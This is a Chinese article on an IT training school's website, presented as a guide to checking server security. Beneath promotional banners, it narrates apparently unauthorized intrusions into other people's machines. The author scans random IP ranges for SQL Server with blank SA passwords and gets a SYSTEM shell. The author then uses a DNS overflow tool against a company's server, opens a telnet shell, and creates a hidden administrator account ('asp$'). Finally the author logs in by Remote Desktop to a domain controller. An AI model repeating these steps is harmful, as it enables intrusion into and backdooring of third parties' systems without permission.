自己動手解決服務(wù)器上的安全問題

不僅僅統(tǒng)招學歷喲

熱門專業(yè)！
大學校園！
就業(yè)保障！
拿學歷又能高薪就業(yè)，誰能不愛！

了解詳情>

讓每一個家庭“安心”、“放心”

教學為本
師愛為魂
安心學習
放心就業(yè)

了解詳情>

深耕細作IT職業(yè)教育15載

青鳥之星教學質(zhì)量大獎
卓越風云人物
北大青鳥中心理事會成員
七項榮耀載譽而行！

了解詳情>

我們教學怎么樣

實力見證
網(wǎng)絡(luò)組一等獎
網(wǎng)絡(luò)組二等獎
軟件組四等獎
200家校區(qū)脫穎而出！

了解更多>

北大青鳥職業(yè)IT20周年

重承諾
守信用
放心品牌
放心學習
靠靠譜譜好就業(yè)！

了解更多>

我命由我不由天

學個性的技術(shù)
做愛做的事
掙滿意的錢
衣食無憂
選擇寬且高大尚！

了解更多>

我們靠不靠譜

14年辦學
14年磨練
14年成長
14年探索
只為讓每個學員成材！

了解更多>

不打工也牛掰

好工作
好環(huán)境
高薪資
好課程
支持你成為有“錢”人！

了解更多>

學IT就讀北大青鳥

好工作
好未來
好老師
好課程
支持你成為受人尊敬的人！

作者：鄭州計算機學校添加時間：09-07 瀏覽次數(shù)：0

相信現(xiàn)在每個企業(yè)都有自己的服務(wù)器，但是有服務(wù)器但是安全問題一直是個很頭疼的問題對吧，那么今天咱們就一起看下怎么自己動手為服務(wù)器進行安全維護

測試工具：

1.S掃描器(一種速度極快的多線程命令行下的掃描工具)

2.SQL登陸器

3.DNS溢出工具

4.cmd(微軟命令行工具)

5.scansql.exe(SQL弱口令掃描工具)

一、SQL Server弱口令測試

1.緣由：

SQL Server是很多中小型企業(yè)、事業(yè)單位的首選數(shù)據(jù)庫系統(tǒng)，由于一些管理員的疏忽或者安全意識淡薄，總是以數(shù)據(jù)庫默認的用戶SA登錄數(shù)據(jù)庫，并且采用了默認的空密碼或者設(shè)置了若口令。

2.測試：

以筆者本機IP為中心，隨機選取了一個IP段進行測試。

第一步：在命令提示符下運行s掃描器，輸入一個IP段：

s syn 61.178.*.1 61.178.*.254 1433 掃描到13個開了1433端口的服務(wù)器。

第二步：把掃描結(jié)果保存為一個文本文件，然后用scansql.exe工具對這些IP進行若口令檢測，檢測到2個弱口令的IP。然后打開SQL連接器，輸入其中一個若口令I(lǐng)，賬戶"sa“空密碼連接成功如圖2。然后敲命令”dir c:“，可以執(zhí)行，如圖3。這樣就等于獲得了一個具有system權(quán)限的shell(比管理員權(quán)限還高!)，至此這臺數(shù)據(jù)庫服務(wù)器淪陷。(圖2)(圖3)

總結(jié)：雖然從上面這個IP段得到的存在SQL弱口令的服務(wù)器并不多，但如果存在弱口令并且被攻擊者者利用，那對數(shù)據(jù)庫服務(wù)器的打擊將是毀滅性的，管理員們一定要加固數(shù)據(jù)庫的口令。

二、DNS溢出測試

1.緣由：

DNS溢出漏洞是去年微軟的一個高危漏洞，攻擊者通過該漏洞可以溢出

獲得一個shell，進而控制這臺服務(wù)器。一年過去了，還有存在該漏洞的服務(wù)器嗎?

2.測試：

筆者以某企業(yè)網(wǎng)站的IP為中心進行測試。

第一步：先看看該網(wǎng)站W(wǎng)eb服務(wù)器的IP地址，打開命令提示符，敲入如下命令：ping www.*.com，得知ip地址為：202.2##.*.196。

第二步：以202.2##.*.196為中心確定一個IP段，在命令行下用S掃描器掃描開放了53端口(DNS端口)的服務(wù)器。對掃描結(jié)果中的IP逐個進行溢出測試，經(jīng)過一次次的測試找到了一個存在DNS溢出的IP。在命令行下敲入如下命令：dns -s 202.2##.*.196。

說明：服務(wù)器采用的是windows 2000，在1052端口存在DNS溢出漏洞。

第三步：繼續(xù)在命令行下，敲入如下命令：dns -t2000all 202.2##.*.196 1052

第四步：重新打開另外一個命令提示符，敲入命令：telnet 202.2##.*.196 1100，速度很快，返回一個shell，溢出成功。在telnet界面中敲入如下命令：net query，顯示如圖6，看來管理員不在線。

第五步：在Telnet命令提示符下敲入命令：net user asp$ "test" /add

net localgroup administrators asp$ /add，建立一個具有管理員權(quán)限的asp$賬戶，密碼為“test”。在本機運行“mstsc”，打開“遠程桌面連接工具”，輸入IP地址：202.2##.*.196，用戶名：asp$

密碼：test，連接成功。

第六步：打開“管理工具”，發(fā)現(xiàn)這臺主機還是一個域控制器，打開“域用戶和計算機”，域成員竟然有43511個如圖8，看來這個企業(yè)的局域網(wǎng)的規(guī)模不小。(圖8)

總結(jié)：一年前的漏洞到現(xiàn)在還沒有打，管理員太失職了。

上面有關(guān)服務(wù)器的兩例安全測試，雖是個案不具有普遍性，但其中反應(yīng)出的管理員的疏忽大意及其安全意識淡薄是不容忽視的。

管理員們往往以維持服務(wù)器的穩(wěn)定、高效地運行作為自己的工作目標，但是對于服務(wù)器的安全性往往考慮得較少，至少對于某些管理員是這樣的。

本文由站河南北大青鳥校區(qū)整編而成，如需了解更多IT資訊類的文章、新聞、課程和學習技巧、就業(yè)案例、招生詳情等問題，可以對在線咨詢老師進行一對一問答！